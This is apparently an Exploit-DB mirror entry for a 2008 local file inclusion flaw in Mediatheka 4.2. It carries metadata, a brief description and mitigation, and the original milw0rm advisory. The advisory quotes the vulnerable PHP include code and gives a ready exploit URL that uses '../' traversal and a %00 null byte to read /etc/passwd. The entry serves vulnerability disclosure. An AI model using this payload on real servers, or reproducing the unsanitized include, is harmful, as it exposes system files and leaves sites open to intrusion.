header-logo
Suggest Exploit
vendor:
Mediatheka
by:
Osirys
7.5
CVSS
HIGH
Local File Inclusion
22
CWE
Product Name: Mediatheka
Affected Version From: 4.2
Affected Version To: 4.2
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Mediatheka 4.2 Local File Inclusion

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'lang' parameter to '/[path]/index.php'. This can be exploited to include arbitrary local files by passing directory traversal sequences (e.g. '../') and a NULL byte (%00) to terminate the include statement.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.
Source

Exploit-DB raw data:

[START]

#########################################################################################
[0x01] Informations:

Script         : Mediatheka 4.2
Download       : http://www.hotscripts.com/jump.php?listing_id=79106&jump_type=1
Vulnerability  : Local File Inclusion
Author         : Osirys
Contact        : osirys[at]live[dot]it
Notes          : Proud to be Italian
Greets:        : XaDoS, x0r, emgent, Jay, str0ke

#########################################################################################
[0x02] Bug:[Local File Inclusion]
######

Bugged file is: /[path]/index.php

[CODE]

	if(isset($_GET['lang']))
		$lang = $_GET['lang'];
	else
		$lang = 'en';
	include("langs/$lang.php");

[/CODE]


[!] EXPLOIT: /[path]/index.php?lang=[local_file_to_include]
                                    ../../../../../../../../../../../etc/passwd%00
#########################################################################################

[/END]

# milw0rm.com [2008-12-14]